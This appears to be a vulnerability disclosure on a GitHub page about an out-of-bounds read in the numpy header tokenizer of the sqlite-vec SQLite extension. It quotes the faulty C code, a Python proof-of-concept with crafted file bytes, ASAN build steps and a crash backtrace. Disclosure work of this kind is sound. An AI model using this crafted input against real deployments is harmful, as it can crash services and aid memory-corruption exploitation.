Skip to content

Latest commit

 

History

History
135 lines (110 loc) · 4.62 KB

OOBR_1.md

File metadata and controls

135 lines (110 loc) · 4.62 KB

version: 0.1.1

tag: OOBR, VectorDB, Parse

https://github.com/asg017/sqlite-vec

A vector search SQLite extension which has 3.6k stars. It can load numpy file.

//https://github.com/asg017/sqlite-vec/blob/main/sqlite-vec.c#L2473C1-L2478C2
void npy_scanner_init(struct NpyScanner *scanner, const unsigned char *source,
                      int source_length) {
  scanner->start = (unsigned char *)source;
  scanner->end = (unsigned char *)source + source_length;
  scanner->ptr = (unsigned char *)source;
}

// https://github.com/asg017/sqlite-vec/blob/main/sqlite-vec.c#L2489C1-L2500C70
int parse_npy_header(sqlite3_vtab *pVTab, const unsigned char *header,
                     size_t headerLength,
                     enum VectorElementType *out_element_type,
                     int *fortran_order, size_t *numElements,
                     size_t *numDimensions) {

  struct NpyScanner scanner;
  struct NpyToken token;
  int rc;
  npy_scanner_init(&scanner, header, headerLength);

  if (npy_scanner_next(&scanner, &token) != VEC0_TOKEN_RESULT_SOME &&  //<-----[1]
    ...

The function parse_npy_header is used to parse the numpy file. It uses scanner to record the position. npy_scanner_next continues to call npy_token_next.

//https://github.com/asg017/sqlite-vec/blob/main/sqlite-vec.c#L2390
int npy_token_next(unsigned char *start, unsigned char *end,
                   struct NpyToken *out) {
  unsigned char *ptr = start;
  while (ptr < end) {
    unsigned char curr = *ptr;
    if (is_whitespace(curr)) {
      ptr++;
      continue;
    } else if (curr == '(') {
      ...
    } else if (curr == '\'') {
      unsigned char *start = ptr;
      ptr++;
      while (ptr < end) {  //<----------------[2]
        if ((*ptr) == '\'') {
          break;
        }
        ptr++;            
      }
      if ((*ptr) != '\'') {     //<----------------[3]
        return VEC0_TOKEN_RESULT_ERROR;
      }
      out->start = start;
      out->end = ++ptr;
      out->token_type = NPY_TOKEN_TYPE_STRING;
      return VEC0_TOKEN_RESULT_SOME;
    } else if (curr == 'F' &&
        ...
    } else if (is_digit(curr)) {
        ...
    } else {
      return VEC0_TOKEN_RESULT_ERROR;
    }
  }
  return VEC0_TOKEN_RESULT_ERROR;
}

In npy_token_next, a problem occurs in the parsing of '. When the first ' appears, it continues to scan forward, attempting to find the second ', but if there is no matching single quote for the first ' in the entire data, it will exit the while loop, at which point ptr==end, pointing to the next address in the data space, i.e., an illegal address, which causes an out-of-bounds read at [3].

Poc code:

import sqlite3

def execute_all(cursor, sql, args=None):
    if args is None:
        args = []
    results = cursor.execute(sql, args).fetchall()
    return list(map(lambda x: dict(x), results))

def connect(ext, path=":memory:", extra_entrypoint=None):
    db = sqlite3.connect(path)
    db.enable_load_extension(True)
    db.load_extension(ext)
    db.row_factory = sqlite3.Row
    return db

db = connect("./dist/vec0")

vec_npy_each_f = lambda *args: execute_all(
    db, "select * from vec_npy_each(?)", args
)

with open("./poc.npy", "rb") as f:
    data = f.read()
    print(vec_npy_each_f(data))

Poc data: 00000000: 934e 554d 5059 0000 0200 2722 .NUMPY....'"

Poc env:

We should compile with ASAN: clang -fPIC -shared -Wall -Wextra -g -O0 -lm -lsqlite3 sqlite-vec.c -o dist/vec0.so.
Then, install python library sqlite-vec.
Last, run LD_PRELOAD=/usr/lib/llvm-14/lib/clang/14.0.0/lib/linux/libclang_rt.asan-x86_64.so python3 poc.py -detect_leaks=0

Backtrace:

=================================================================
==829223==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000003c at pc 0x555555b71042 bp 0x7fffffff3db0 sp 0x7fffffff3da8
READ of size 1 at 0x60200000003c thread T0
[Detaching after fork from child process 829233]
    #0 0x555555b71041 in npy_token_next /sqlite-vec/sqlite-vec.c:2437:12
    #1 0x555555b717be in npy_scanner_next /sqlite-vec/sqlite-vec.c:2481:12
    #2 0x555555b71a9a in parse_npy_header /sqlite-vec/sqlite-vec.c:2500:7
    #3 0x555555b743bf in parse_npy_buffer /sqlite-vec/sqlite-vec.c:2808:12
    #4 0x555555b9c35d in vec_npy_eachFilter /sqlite-vec/sqlite-vec.c:2967:10
    #5 0x555555891c5b in sqlite3VdbeExec /sqlite-vec/vendor/sqlite3.c:101441:8
    #6 0x5555557875cd in sqlite3Step /sqlite-vec/vendor/sqlite3.c:91222:10
    #7 0x5555557730a4 in sqlite3_step /sqlite-vec/vendor/sqlite3.c:91283:16